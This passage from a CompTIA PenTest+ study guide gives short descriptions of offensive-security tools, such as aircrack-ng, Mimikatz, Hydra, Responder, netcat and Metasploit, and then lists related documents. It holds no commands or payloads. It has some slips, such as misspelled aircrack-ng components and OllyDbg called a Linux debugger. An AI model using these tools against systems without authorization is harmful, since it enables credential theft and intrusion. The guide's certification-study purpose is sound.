and policies created on multicloud platforms by collecting data using API
calls

● Networking Tools
o Networking Tools
▪ Used to monitor, analyze, or modify network traffic on a network

o Wireshark
▪ An open-source protocol analysis tool that can conduct packet sniffing,
decoding, and analysis

o Tcpdump
▪ A command-line protocol analysis tool that can conduct packet sniffing,
decoding, and analysis

o Hping
- 222 -

▪ An open-source packet crafting tool used to exploit vulnerable firewalls

and IDS/IPS
● TCP
● UDP
● ICMP
● RAW-IP

● Wireless Tools

o Aircrack-ng
▪ A powerful open-source wireless exploitation tool kit consisting of
airomon-ng, airodump-ng, aireplay-ng, and airocrack-ng

▪ Airomon-NG
● Used to monitor wireless frequencies to identify access points and
clients

▪ Airodump-NG
● Used to capture network traffic and save it to a PCAP file

▪ Aireplay-NG
● Used to conduct a deauthentication attack by sending spoofed
deauth requests to the access point

▪ Airocrack-NG
- 223 -

● Used to conduct protocol and password cracking of wireless

encryption

o Kismet
▪ An open-source tool that contains a wireless sniffer, a network detector,
and an intrusion detection system

o Wifite
▪ A wireless auditing tool that can be used to conduct a site survey to
locate rogue and hidden access points
o Rogue Access Point
▪ Any wireless access point that has been installed on a secure network
without explicit authorization from a local network administrator

o EAPHammer
▪ A Python-based toolkit that can be used to steal EAP authentication
credentials used in a WPA2-Enterprise network

o mdk4
▪ A wireless vulnerability exploitation toolkit that can conduct 10 different
types of 802.11 exploitation techniques

o Spooftooph
▪ Automates the spoofing or cloning of a Bluetooth device’s name, class,
and address

o Reaver
▪ A tool that conducts a brute-force attack against an access point’s Wi-Fi
Protected Setup (WPS) PIN to recover the WPA PSK

o Wireless Geographic Logging Engine (WiGLE)

▪ A wireless OSINT tool that consists of a website and database dedicated
to mapping and indexing all known wireless access point

o Fern

- 224 -

▪ Tests wireless networks by conducting password recovery through brute

force and dictionary attacks, as well as session hijacking, replay, and on-
path attacks

● Social Engineering Tools

o Social Engineering Toolkit (SET)

▪ A Python-based collection of tools and scripts that are used to conduct
social engineering during a penetration test

o Browser Exploitation Framework (BeEF)

▪ Used to assess the security posture of a target environment using cross-
site attack vectors
▪ BeEF is a great tool for testing browsers and associated web servers and
applications

● Remote Access Tools

o Remote Access Tools
▪ Used to give an attacker full control of a workstation, server, or other
device, remotely over the Internet

o Secure Shell (SSH)

- 225 -

▪ A command-line tool that is used to remotely control another

workstation over a LAN or WAN

o Netcat (nc)
▪ A command-line utility used to read from or write to TCP, UDP, or Unix
domain socket network connections

o Ncat
▪ An improved version of netcat which can also act as a proxy, launch
executables, transfer files, and encrypt all communications to and
from the victim machine

o ProxyChains
▪ A command-line tool that enables penetration testers to mask their
identity and/or source IP address by sending messages through proxy
servers or other intermediaries

● Credential Testing Tools

o Credential Testing Tools
▪ Used to crack passwords and other authentication tokens to gain access
to a user’s account on a given system or network

o Hashcat
▪ A modern password and hash cracking tool that supports the use of GPUs
for parallel processing when conducting dictionary, brute force, and
hybrid attacks
o Medusa
- 226 -

▪ A parallel brute-force tool that is used against network logins to attack

services that support remote authentication

o Hydra
▪ A parallel brute-force tool that also supports a pw-inspect module to only
attempt passwords from a dictionary that meets the minimum password
requirements for a given system

o CeWL
▪ Used to generate word lists based on the automatic crawling of a website
to collect words and metadata from the site

o John the Ripper

▪ A password cracking tool that supports large sets of hashes and
dictionary and brute-force attacks

o Cain
▪ A legacy password cracking and hash dumping that can conduct network
sniffing to identify hashes that may be vulnerable to cracking

o Mimikatz
▪ A tool that gathers credentials by extracting key elements from the
memory of a system such as cleartext passwords, hashes, and PIN codes
● Pass-the-hash
● Pass-the-ticket
● Golden ticket

o Patator
▪ A multi-purpose brute-force tool that that supports several different
methods, including ftp, ssh, smb, vnc, and zip password cracking

o DirBuster
▪ A brute-force tool run against a web application or server to identify
unlisted directories and file names that may be accessed

o Web Application Attack and Audit Framework (w3af)

- 227 -

▪ A tool used to identify and exploit a large set of web-based

vulnerabilities, such as SQL injection and cross-site scripting

● Web Application Tools

o Web Application Tools
▪ Used to identify and exploit vulnerabilities in deployed web applications

o OWASP ZAP (Zed Attack Proxy)

▪ An open-source web application security scanner and attack proxy used
in automated and manual testing and identification of web application
vulnerabilities

o Burp Suite
▪ Used in raw traffic interception, inspection, and modification during
automated testing, manual request modification, and passive web
application analysis

o Gobuster
▪ A brute-force dictionary, file, and DNS identification tool used to identify
unlisted resources in a web application

● Cloud Tools
- 228 -

o Cloud Tools
▪ Used to identify and exploit vulnerabilities in SaaS, PaaS, and IaaS cloud-
based services

o ScoutSuite
▪ An open-source tool written in Python that can be used to audit instances
and policies created on multicloud platforms by collecting data using API
calls

o CloudBrute
▪ Used to find a target’s infrastructure, files, and apps across the top cloud
service providers, including Amazon, Google, Microsoft, DigitalOcean,
Alibaba, Vultr, and Linode

o Pacu
▪ An exploitation framework used to assess the security configuration of an
Amazon Web Services (AWS) account

o Cloud Custodian
▪ An open-source cloud security, governance, and management tool
designed to help admins create policies based on
different resource types

● Steganography Tools
- 229 -

o Steganography Tools
▪ Used to hide and conceal information, communication, and activity in
plain sight

o OpenStego
▪ A free steganography solution to conduct data hiding within a file and
watermarking of files with invisible signatures to detect unauthorized file
copying

o Steghide
▪ An open-source steganography tool used to conceal a payload by
compressing, concealing, and encrypting its data in an image or audio file

o Snow
▪ A command-line steganography tool that conceals a payload within the
whitespace of an ASCII formatted text file in plaintext or encrypted
format

o Coagula
▪ An image synthesizer tool that can be used to create a sound file (.wav)
from a given image

o Sonic Visualiser
▪ An open-source application for viewing and analyzing the contents of
music audio files

o TinEye

- 230 -

▪ A website that can be used to conduct reverse image searches using

image recognition

o Metagoofil
▪ A Python-based tool that can search for metadata from public documents
located on a target’s website

o Online SSL Checkers

▪ A web application that can be used to test the validity, strength, and
security of an SSL or TLS digital certificate for a given web server

● Debuggers
o Debugging Tools
▪ Used to decompile executables and observe their behavior

o OllyDbg
▪ A Linux debugger that can be used to analyze binary code found in 32-bit
Windows applications

o Immunity Debugger
▪ A debugger built specifically for penetration testers to write exploits,
analyze malware, and reverse engineer binary files using Python scripts
and APIs

o GNU Debugger (GDB)

▪ An open-source, cross-platform debugger for Unix, Windows, and MacOS

o WinDbg
- 231 -

▪ A free debugging tool that is distributed by Microsoft for use in the

Windows operating system

o Interactive Disassembler (IDA)

▪ A commercial disassembler and debugging tool that generates assembly
language source code from machine-executable code

o Covenant
▪ An open-source .NET framework focused on penetration testing that also
has a development and debugging component

o SearchSploit
▪ A tool used to find exploits available in the Exploit-DB

● Miscellaneous Tools
o Miscellaneous Tools
▪ Tools that don’t fit well into one of the other categories

o SearchSploit
▪ A tool used to find exploits available in the Exploit-DB

o PowerSploit
▪ A collection of PowerShell modules that create an extensive exploitation
framework for use against Windows systems

o Responder
▪ A command-line tool in Kali Linux that is used to poison NetBIOS, LLMNR,
and MDNS name resolution requests
o Impacket Tools
- 232 -

▪ An open-source collection of python classes for working with network

protocols and the exploitation of Windows systems
● Remote Execution
● Kerberos
● Windows Secrets
● MiTM Attacks
● WMI
● SMB/MSRPC

o Empire
▪ A C2 framework that uses PowerShell for common post-exploitation tasks
on Windows systems and Python for post-exploitation tasks
on Linux systems

o Metasploit
▪ A multi-purpose computer security and penetration testing framework
that uses modularized attacks against known software vulnerabilities to
exploit systems

o mitm6
▪ An IPv6 DNS hijacking tool that attempts to set the malicious actor as the
DNS server by replying to DHCPv6 messages and then redirecting the
victim to another malicious host

o CrackMapExec
▪ A post-exploitation tool to identify vulnerabilities in Active Directory
environments

o TruffleHog
▪ A Git secrets search tool that automatically crawls through a repository
looking for accidental commits of secrets to the Git repository

o Censys
▪ A website search engine used for finding hosts and networks across the
Internet with data about their configuration

Conclusion
- 233 -

● Take lots of practice exams before the official certification

o Did you score at least 90% or higher?
o If you need more practice, take additional practice exams to hone your skills
before attempting the exam

● You can take the exam at any PearsonVue testing center worldwide at any local testing
center

● Purchase your exam vouchers at pearsonvue.com or store.comptia.org

● If you would like to save 10% or more on your exam voucher, please visit
diontraining.com/vouchers to purchase your official exam voucher at a discount

- 234 -

The Official Comptia Cysa Student Guide Exam Cs0 002 PDF Free
No ratings yet
The Official Comptia Cysa Student Guide Exam Cs0 002 PDF Free
675 pages
Downloadable Official CompTIA Security+ Student Guide
100% (8)
Downloadable Official CompTIA Security+ Student Guide
628 pages
Downloadable Official CompTIA PenTest+ Student Guide
100% (3)
Downloadable Official CompTIA PenTest+ Student Guide
552 pages
Secbay Press - CompTIA CySA+ Exam Prep Guide Exam CS0-003-Secbay Press (2024)
100% (2)
Secbay Press - CompTIA CySA+ Exam Prep Guide Exam CS0-003-Secbay Press (2024)
596 pages
Comptia Sy0-701 Dump
No ratings yet
Comptia Sy0-701 Dump
30 pages
Book - SOC Analyst NOW!
No ratings yet
Book - SOC Analyst NOW!
87 pages
CompTIA Pentest Study Guide PDF
100% (1)
CompTIA Pentest Study Guide PDF
71 pages
PT0-003 CompTIA PenTest+ Updated Practice Questions
100% (1)
PT0-003 CompTIA PenTest+ Updated Practice Questions
26 pages
CompTIA+Security++ (SY0 701) +Study+Guide
100% (1)
CompTIA+Security++ (SY0 701) +Study+Guide
413 pages
SY0-701 Dumpsbase
100% (1)
SY0-701 Dumpsbase
180 pages
Downloadable Official CompTIA PenTest+ Instructor Guide
75% (4)
Downloadable Official CompTIA PenTest+ Instructor Guide
518 pages
Pentest Studyguide Pt0-001 Samplelesson
75% (4)
Pentest Studyguide Pt0-001 Samplelesson
44 pages
CompTIA PenTest+ Practice Exam
100% (1)
CompTIA PenTest+ Practice Exam
21 pages
CompTIA SY0 701
100% (2)
CompTIA SY0 701
232 pages
The Official Comptia Cysa+ Student Guide (Exam Cs0-002)
100% (7)
The Official Comptia Cysa+ Student Guide (Exam Cs0-002)
675 pages
Pentest+ Presentation
100% (1)
Pentest+ Presentation
52 pages
Downloadable Official CompTIA Security+ Student Guide
100% (13)
Downloadable Official CompTIA Security+ Student Guide
708 pages
Pentest (pt0 002)
No ratings yet
Pentest (pt0 002)
17 pages
Untitled
No ratings yet
Untitled
772 pages
Job Application Letter Sample For Tourism
100% (1)
Job Application Letter Sample For Tourism
5 pages
Comptia Pentest Exam Objectives (2 0)
No ratings yet
Comptia Pentest Exam Objectives (2 0)
16 pages
CompTIA PenTest+
100% (1)
CompTIA PenTest+
46 pages
SY0-701 CompTIA Security Exam Dumps
50% (2)
SY0-701 CompTIA Security Exam Dumps
31 pages
CompTIA Network+ A Comprehensive Beginners Guide To Learn About The CompTIA Network+ Certification From A-Z by Schmidt, Walker
100% (4)
CompTIA Network+ A Comprehensive Beginners Guide To Learn About The CompTIA Network+ Certification From A-Z by Schmidt, Walker
166 pages
CompTIA - SY0-701.vJun-2024.by .Davac .94q
100% (1)
CompTIA - SY0-701.vJun-2024.by .Davac .94q
51 pages
PenTest Guide
No ratings yet
PenTest Guide
4 pages
Comptia: Exam Questions N10-009
100% (3)
Comptia: Exam Questions N10-009
32 pages
CompTIA CASP (CAS-004) Study Notes
No ratings yet
CompTIA CASP (CAS-004) Study Notes
197 pages
CompTIA - CS0-003.vJan-2024.by .Lena .91q
No ratings yet
CompTIA - CS0-003.vJan-2024.by .Lena .91q
53 pages
SY0 601 EXAMTOPICS - Edit
50% (2)
SY0 601 EXAMTOPICS - Edit
74 pages
CompTIA A+ Study Notes
100% (3)
CompTIA A+ Study Notes
188 pages
Downloadable Official CompTIA Security+ Student Guide
100% (3)
Downloadable Official CompTIA Security+ Student Guide
800 pages
Exp 301
No ratings yet
Exp 301
604 pages
Cysa Studyguide cs0-003 Samplelesson
50% (2)
Cysa Studyguide cs0-003 Samplelesson
31 pages
CySA+ Study Guide Public
100% (3)
CySA+ Study Guide Public
63 pages
CompTIA CySA Practice Exams A Time Compressed Resource To Passing
100% (3)
CompTIA CySA Practice Exams A Time Compressed Resource To Passing
361 pages
CompTIA CASP+ CAS-004 Certification Guide
92% (12)
CompTIA CASP+ CAS-004 Certification Guide
654 pages
CAS-004 Updated Dumps - CompTIA Advanced Security Practitioner (CASP+) Exam
No ratings yet
CAS-004 Updated Dumps - CompTIA Advanced Security Practitioner (CASP+) Exam
54 pages
Sy0-701 8
No ratings yet
Sy0-701 8
31 pages
Penetrating Networks For CompTIA PenTest+
100% (1)
Penetrating Networks For CompTIA PenTest+
54 pages
CySA Study Notes
100% (3)
CySA Study Notes
54 pages
Tenant Declaration Form
No ratings yet
Tenant Declaration Form
2 pages
CySA+ CS0-002 Cheat Sheet
100% (3)
CySA+ CS0-002 Cheat Sheet
31 pages
SY0-701 CompTIA Security+ Certification Exam Questions and Answers PDF - PDF Room
No ratings yet
SY0-701 CompTIA Security+ Certification Exam Questions and Answers PDF - PDF Room
30 pages
CompTIA - SY0-701.vAug-2024.by .Akio .107q
100% (1)
CompTIA - SY0-701.vAug-2024.by .Akio .107q
56 pages
Test
No ratings yet
Test
708 pages
Professor Messer Flashcards
100% (3)
Professor Messer Flashcards
56 pages
CompTIA-SY0-601 - Exam Questions-Dumpedia
100% (1)
CompTIA-SY0-601 - Exam Questions-Dumpedia
216 pages
Lesson 7: Implementing Authentication Controls
100% (2)
Lesson 7: Implementing Authentication Controls
35 pages
Sy0-701 6
No ratings yet
Sy0-701 6
30 pages
CompTIA A 220-1102 Study Guide
100% (1)
CompTIA A 220-1102 Study Guide
128 pages
CompTIA Security+ Cheat Sheet
100% (7)
CompTIA Security+ Cheat Sheet
12 pages
CompTIA Security+ (SY0-601) Learn
100% (3)
CompTIA Security+ (SY0-601) Learn
81 pages
CompTIA CySA+ Cybersecurity Analyst Certification Practice Exams (Exam CS0-001)
90% (10)
CompTIA CySA+ Cybersecurity Analyst Certification Practice Exams (Exam CS0-001)
337 pages
Sy0-701 1
No ratings yet
Sy0-701 1
32 pages
CompTIA 220-701 A+ Essentials
100% (3)
CompTIA 220-701 A+ Essentials
253 pages
My Aadhaar PDF
No ratings yet
My Aadhaar PDF
1 page
CompTIA Security+ (SY0 - 701)
50% (2)
CompTIA Security+ (SY0 - 701)
1 page
Application For Service - Electrical Works Request (EWR) For New and Existing Installations
No ratings yet
Application For Service - Electrical Works Request (EWR) For New and Existing Installations
1 page
Answer:: Free Exam/Cram Practice Materials - Best Exam Practice Materials
No ratings yet
Answer:: Free Exam/Cram Practice Materials - Best Exam Practice Materials
4 pages
CompTIA Cybersecurity Career Pathway
No ratings yet
CompTIA Cybersecurity Career Pathway
2 pages
Patient Record Maintenance
No ratings yet
Patient Record Maintenance
2 pages
Information Security Project Report
No ratings yet
Information Security Project Report
3 pages
Untitled
No ratings yet
Untitled
562 pages
Week-3-Lesson-3 - Paraphrasing-Academic-Texts Word
No ratings yet
Week-3-Lesson-3 - Paraphrasing-Academic-Texts Word
22 pages
Setting The Future of Digital and Social Media Ma 2020 International Journal
No ratings yet
Setting The Future of Digital and Social Media Ma 2020 International Journal
37 pages
Changing Attitude of Indian Consumer Towards Online Shopping
No ratings yet
Changing Attitude of Indian Consumer Towards Online Shopping
36 pages
Ethics in Business Research
No ratings yet
Ethics in Business Research
23 pages
IT Professional Ethics Unsorted
No ratings yet
IT Professional Ethics Unsorted
12 pages
Chapter 1 Introduction
No ratings yet
Chapter 1 Introduction
44 pages
User BimTek
No ratings yet
User BimTek
16 pages
Phishing
No ratings yet
Phishing
8 pages
53 Shell National Students Art Competition: Theme
No ratings yet
53 Shell National Students Art Competition: Theme
8 pages
Moot Court Preposition (Sample)
No ratings yet
Moot Court Preposition (Sample)
9 pages
Final Review For Main Project
No ratings yet
Final Review For Main Project
25 pages
Yearly Prayer Times 2019 - IslamicFinder
No ratings yet
Yearly Prayer Times 2019 - IslamicFinder
13 pages
MT Felix Jedrzejewski Privacy Preserving Natural Language Processing
No ratings yet
MT Felix Jedrzejewski Privacy Preserving Natural Language Processing
141 pages
Comprehensive Comparison of All Major AI Platforms
No ratings yet
Comprehensive Comparison of All Major AI Platforms
3 pages
Security Lo1-1
No ratings yet
Security Lo1-1
62 pages
4 Computer Ethics and The Ten Commandments
No ratings yet
4 Computer Ethics and The Ten Commandments
10 pages
Cis Saidi Milena Pineda Palomino - Enero - 11 - 2023
No ratings yet
Cis Saidi Milena Pineda Palomino - Enero - 11 - 2023
3 pages
Aadhar Card Security
No ratings yet
Aadhar Card Security
3 pages
Itia01 Lesson 5
No ratings yet
Itia01 Lesson 5
4 pages
Constitutional Law Sem 4 Notes
No ratings yet
Constitutional Law Sem 4 Notes
7 pages
Consent Form APAAR
No ratings yet
Consent Form APAAR
1 page
Ias Quiz 1 Lesson 1
No ratings yet
Ias Quiz 1 Lesson 1
3 pages
Critical Reading
No ratings yet
Critical Reading
13 pages
CompTIA CySA+ Study Guide: Exam CS0-003
From Everand
CompTIA CySA+ Study Guide: Exam CS0-003
Mike Chapple
2/5 (1)
CompTIA Security+ Practice Tests SY0-501: Practice tests in 4 different formats and 6 cheat sheets to help you pass the CompTIA Security+ exam
From Everand
CompTIA Security+ Practice Tests SY0-501: Practice tests in 4 different formats and 6 cheat sheets to help you pass the CompTIA Security+ exam
Ian Neil
No ratings yet
CompTIA Security+ Practice Questions
From Everand
CompTIA Security+ Practice Questions
IP Specialist
2/5 (1)